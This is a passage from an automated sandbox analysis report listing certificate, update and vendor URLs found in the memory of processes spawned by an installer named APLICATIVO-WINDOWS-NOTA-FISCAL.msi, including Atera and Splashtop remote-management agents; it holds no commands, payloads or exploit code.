0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001C7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8022000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2130986157.000001F736C1E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2086789811.000001F71CD2C000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.2245155748.0000014BCFF3E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000003.2242282661.0000014BCFF0B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000003.2243419604.0000014BCFF3E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2773209313.0000022039F7D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2981477200.00000153FE098000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2790839667.0000029E3B677000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, System.Threading.Tasks.dll.26.dr, Pubnub.dll0.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/l
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedRootG4.crlLow
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8022000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.000002163092E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630946000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2901951908.0000021649213000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl7
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlu
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/lE~
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabgN
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A21000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B491000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.splashtop.com
                                Source: AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.openjdk.java.net/mailman/listinfo
                                Source: rundll32.exe, 00000004.00000002.1704657212.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.splashtop.com
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/dummynamespace/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/3
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/5
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://nlog-project.org/ws/T
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice(
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/1~0Q
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B090000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1985317540.000002156C3F5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1985299370.0000015E7E13A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, System.Threading.Tasks.dll.26.dr, Pubnub.dll0.1.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://ocsp.digicert.com0K
